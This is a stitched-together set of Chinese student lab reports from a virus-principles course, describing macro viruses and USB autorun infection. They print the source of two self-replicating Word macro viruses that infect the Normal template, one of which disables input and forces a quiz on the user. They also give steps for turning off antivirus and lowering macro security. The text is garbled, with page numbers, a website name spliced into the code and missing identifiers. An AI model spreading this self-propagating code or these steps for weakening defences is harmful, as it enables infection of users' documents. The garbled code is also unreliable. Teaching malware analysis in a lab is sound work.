宏病毒实验报告

1 / 28宏病毒实验报告华北电力大学科技学院实 验 报 告实验名称: 宏病毒实验课程名称:计算机病毒原理与防治专业班级：网络工程 10K2 学生姓名： meter号：1011155145451 成 绩：指导教师： 张少敏 实验日期：2016/10/22 | | | | 学第 页 共 页第 页 共 页第 页 共 页2 / 28第 页 共 页宏病毒分析实验一、实验目的及要求：通过本实验的学习，大家应该理解宏病毒的概念、病毒机制、编写方法、传播手段以及预防处理措施。二、实验基本原理：宏病毒是也是脚本病毒的一种，由于它的特殊性，因此在这里单独算成一类。宏病毒的前缀是：Macro，第二前缀是：Word、Word97、Excel、Excel97 其中之一。凡是只感染WORD97 及以前版本 WORD 文档的病毒采用 Word97 做为第二前缀，格式是：；凡是只感染 WORD97 以后版本 WORD 文档的病毒采用 Word 做为第二前缀，格式是：；凡是只感染EXCEL97 及以前版本 EXCEL 文档的病毒采用 Excel97 做为第二前缀，格式是：；凡是只感染 EXCEL97 以后版本 EXCEL文档的病毒采用 Excel 做为第二前缀，格式是：，依此类推。该类病毒的公有特性是能感染 OFFICE 系列文档，然后3 / 28通过 OFFICE 通用模板进行传播，如：著名的美丽莎()。 一个宏的运行,特别是有恶意的宏程序的运行, 受宏的安全性的影响是最大的, 如果宏的安全性为高,那么,没有签署的宏就不能运行了,甚至,还能使部分 Excel 的功能失效.所以,宏病毒在感染 Excel 之前,会自行对 Excel 的宏的安全性进行修改,把宏的安全性设为低.“%TMSs%LRETURN”仅修改这个还不行,很多宏会涉及到 VisualBasic,所以,宏的安全性还要信任对于”VisualBasic 项目”的访问,所以,综合安全级别的修改,就为“%TMSs%LT%vRETURN” 如何判断信任还是不信任对于”VisualBasic 项目”的访问, 可以用出错捕获进行修改: OnErrorGoToEnd_Sub ExitSub End_Sub: “%TMSs%LT%vRETURN” 本段程序的功能为: 其它功能的程序段一旦宏无法正常就进行宏的安全性的修改4 / 28和对信任对于”VisualBasic 项目”的访问的修改,从而这宏病毒的正常运行提供系统支持.本程序应放在 VBA 中的 ThisWorkbookPrivateSubWorkbook_Open()EndSub这样一旦打开工作薄就会对其进行有效的修改.完整的程序为:PrivateSubWorkbook_Open() OnErrorGoToEnd_Sub 其它功能的程序段 ExitSubEnd_Sub:“%TMSs%LT%vRETURN”5 / 28EndSub三、主要仪器设备及实验耗材：PC 电脑一台四、实验内容或步骤：1启动 Word，创建一个新文档。2在新文档中打开工具菜单、选择宏、查看宏。3为宏起一个名字，自动宏的名字规定必须为 autoexec。4单击“创建”按钮，如图 5-2 所示。图 5-2 创建宏对话框5在宏代码编辑窗口，输入 VB 代码，调用 Windows 自带的音量控制程序，如图 5-3 所示。Shell6 / 28图 5-3 宏代码编辑窗口6关闭宏代码编辑窗口，将文档存盘并关闭。7再次启动刚保存的文档，可以看到音量控制程序被自动启动。8思考：能否利用自动宏启动其他程序？可以，加上可执行文件的路径能否利用 VB 编写出具有其他功能的程序？自动宏能禁止吗？可以，删除宏实训 U 盘病毒的工作原理一、实训目的通过建立 U 盘自动运行文件，了解 U 盘病毒的工作原理。7 / 28二、实训环境Windows 操作系统，U 盘，计算器程序。三、实训内容一些病毒程序独立存在移动存储设备中，并建立移动盘自动启动文件，当使用者打开移动存储设备时，自动启动文件引导病毒程序启动。自动启动文件是微软公司为了方便用户启动程序而设置的一种名为的文本文件，位于移动盘的根目录，以纯文本的方式存放各种控制命令，用户双击盘符打开移动盘时就会自动打开并执行里面的命令。如果自动启动文件被病毒所利用，当用户双击打开移动盘时就会自动启动病毒程序。 在本实训中我们以自动启动计算器程序为例，理解病毒启动原理，证明利用自动启动文件可以启动病毒程序的现象，并分析移动盘病毒常用手法。8 / 28四、实训步骤1使用记事本或其他文本文件编辑软件在 U 盘中建立文件名为的文本文件。2.新建 txt 文档，以为文件名保存到 U 盘根目录后，如图 5-4 所示，重新插入 U 盘。图 5-4 文件编辑窗口图 重新插入 u 盘后4通过我的电脑双击 U 盘盘符，音量控制程序被启动。五、思考题1. 用菜单里的“工具”“宏”“VISUAL BASIC 编辑器”打开工程，观察哪些文档下已经存在 VBS，哪些文档没有，请分析原因。9 / 282.如何清除和防范感染宏病毒？六、主要参考书参考书： 杨永川, 顾益军, 张培晶等编著. 计算机取证. 北京: 高等教育出版社, XX. 陈龙，麦永浩，黄传河主编. 计算机取证技术. 武汉: 武汉大学出版社, XX. 蒋平, 黄淑华, 杨莉莉编著. 数字取证. 北京: 中国人民公安大学出版社, XX. 涂敏，胡颖辉编著，网络安全与管理，江西: 江西高校出版社，计 算 机 病 毒实验报告姓 名：学 号:老 师：10 / 28日 期：一. 实验目的Word 宏是指能组织到一起为独立命令使用的一系列 Word 指令，它能使日常工作变得容易。本实验演示了宏的编写，通过两个简单的宏病毒示例，说明宏的原理及其安全漏洞和缺陷，理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识。二. 实验内容1. macro virus 中的内容2. 信安实验平台-计算机病毒篇 -计算机宏病毒3. 结合杀毒软件如诺顿、卡巴斯基等，观察病毒查杀现象三. 实验环境1. macro virus11 / 28硬件设备：局域网，终端 PC 机。系统软件：Windows 系列操作系统支撑软件：Word XX软件设置：关闭杀毒软；打开 Word XX，在工具?宏?安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任 visual basic 项目的访问. 实验环境配置如下图所示：受感染终端被感染终端2.计算机宏病毒硬件设备：部署 WINXX 系统的 PC 机一台软件工具：Office wordXX四实验步骤及截图12 / 281.自我复制，感染 word 公用模板和当前文档打开一个 word 文档，然后按 Alt+F11 调用宏编写窗口,在左侧的 projectMicrosoft Word 对象 ThisDocument 中输入以上代码，保存，此时当前 word 文档就含有宏病毒只要下次打开这个 word 文档，就会执行以上代码，并将自身复制到和当前文档的 ThisDocument 中，同时改变函数名，此时所有的 word 文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响 word 的正常使用，本例中只是简单的跳出一个提示框。2.具有一定破坏性的宏我们可以对上例中的恶意代码稍加修改，使其具有一定的破坏性。 该病毒的效果如下：当打开被感染的 word 文档时，首先进行自我复制，感染 word 模板，然后检查日期，看是否是 1 日，然后跳出一个对话框，要求用户进行一次心算游戏，这里只用四个小于 10 的数相乘，如果作者的计算正确，那么就会新建一个文档，跳出如下字幕： 何谓宏病毒13 / 28答案：我就是.实验七 计算机宏病毒分析及清除实验一、实验目的? 了解“宏病毒”机理；? 掌握清除宏病毒的方法；? 掌握采用“宏”和脚本语言进行编程的技术。二、实验时数：2 小时三、实验环境? Windows 2000/XX/XP 或更高级别的 Windows 操作系统；? Office Word 2000/XX 等字处理软件。四、实验要求? 14 / 28演示宏的编写；? 理解宏病毒的作用机制。五、实验步骤：1软件设置关闭杀毒软件；打开 Word 字处理软件，在工具“宏”的“安全性”中，将“安全级”设置为低，在“可靠发行商”选项卡中，选择信任任何所有安装的加载项和模板，选择“信任 visual basic 项目的访问” 。注意：为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过多的 word 文档，否则清除比较麻烦。2自我复制功能演示打开一个 word 文档，然后按 Alt+F11 调用宏编写窗口,在左侧的“projectMicrosoft Word”对象“ThisDocument”中输入以下代码，保存，此时当前 word15 / 28文档就含有宏病毒，只要下次打开这个 word 文档，就会执行以上代码，并将自身复制到和当前文档的 ThisDocument中，同时改变函数名，此时所有的 word 文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响 word 的正常使用，本例中只是简单的跳出一个提示框。完整代码如下：Macro-1：Micro-VirusSub Document_Open()On Error Resume Next= False= FalseSet ourcodemodule = (1).CodeModuleSet host = (1).CodeModule16 / 28If ThisDocument = NormalTemplate ThenSet host = (1).CodeModuleEnd IfWith hostIf .Lines(1, 1) “Micro-Virus” Then.DeleteLines 1, .CountOfLines.InsertLines 1, (1, 100).ReplaceLine 2, “Sub Document_Close()”If ThisDocument = NormalTemplate Then.ReplaceLine 2, “Sub Document_Open()”End If17 / 28End IfEnd WithMsgBox “MicroVirus by Content Security Lab”End Sub以上代码的基本执行流程如下：1) 进行必要的自我保护:= False= False高明的病毒编写者其自我保护将做得非常好，可以使 word的一些工具栏失效，例如将工具菜单中的宏选项屏蔽，也可以修改注册表达到很好的隐藏效果。本例中只是屏蔽状态栏，以免显示宏的运行状态，并且修18 / 28改公用模板时自动保存，不给用户提示。2) 得到当前文档的代码对象和公用模板的代码对象:Set ourcodemodule = (1).CodeModule Set host = (1).CodeModuleIf ThisDocument = NormalTemplate ThenSet host = (1).CodeModuleEnd If3) 检查模板是否已经感染病毒，如果没有，则复制宏病毒代码到模板，并且修改函数名:With HostIf .Lines() “Micro-Virus” Then.DeleteLines 1, .CountOfLines19 / 28.InsertLines 1, Ourcode.ReplaceLine 2, “Sub Document_Close()”If ThisDocument = nomaltemplate Then.ReplaceLine 2, “Sub Document_Open()”End IfEnd IfEnd With4) 执行恶意代码MsgBox “MicroVirus by Content Security Lab”3具有一定破坏性的宏我们可以对上例中的恶意代码稍加修改，使其具有一定的20 / 28破坏性。完整代码如下：Macro_2：moonlightDim nm(4)Sub Document_Open()DisableInput 1Set ourcodemodule = (1).CodeModuleSet host = (1).CodeModuleIf ThisDocument = NormalTemplate T(来自: 海 达范文网:宏病毒实验报告)henSet host = (1).CodeModuleEnd If21 / 28With hostIf .Lines(1, 1) “moonlight” Then.DeleteLines 1, .CountOfLines.InsertLines 1, (1, 100).ReplaceLine 3, “Sub Document_Close()”If ThisDocument = NormalTemplate Then.ReplaceLine 3, “Sub Document_Open()”End IfEnd IfEnd With22 / 28Count = 0If Year(Now() = 2016 Thentry:On Error GoTo trytest = -1con = 1tog$ = “i = 0While test = -1For i = 0 To 4nm(i) = Int(Rnd() * 10)23 / 28con = con * nm(i)If i = 4 Thentog$ = tog$ + Str$(nm(4) + “=?”GoTo begEnd Iftog$ = tog$ + Str$(nm(i) + “*”Next ibeg:Beepans$ = InputBox$(“今天是” + Date$ + “,跟你玩一个心算游戏” + Chr$(13) + “若你答错，只好接受震撼教育.” + Chr$(13) + tog$, “台湾 Macro Virus”)24 / 28If RTrim$(LTrim$(ans$) = LTrim$(Str$(con) Then= wdAlignParagraphCenterBeepWith .Name = “细明体”.Size = 16.Bold = 1.Underline = 1End WithText:=“何谓宏病毒”25 / 28BeepText:=“答案：”= 1Text:=“我就是.”= 0实验报告 2姓名： 班级： 学号：实验题目：_实验二宏病毒实验_一、实验目的了解宏的编写、宏的原理及其安全缺陷；理解宏病毒的作用机制。26 / 28二、实验平台Windows 系列操作系统Word XX 应用程序三、实验步骤1、 软件设置：关闭杀毒软件的自动防护功能。2、 打开 Word XX，在工具?宏?安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任 visual basic 项目的访问。3、 打开一个 word 文档，然后按 Alt+F11 调用宏编写窗口，在左侧的 projectMicrosoft Word 对象?ThisDocument中输入源代码，保存。4、 此时当前 word 文档就含有宏病毒，只要下次打开这个27 / 28word 文档，就会执行以上代码，并将自身复制到和当前文档的 ThisDocument 中，同时改变函数名。此时所有的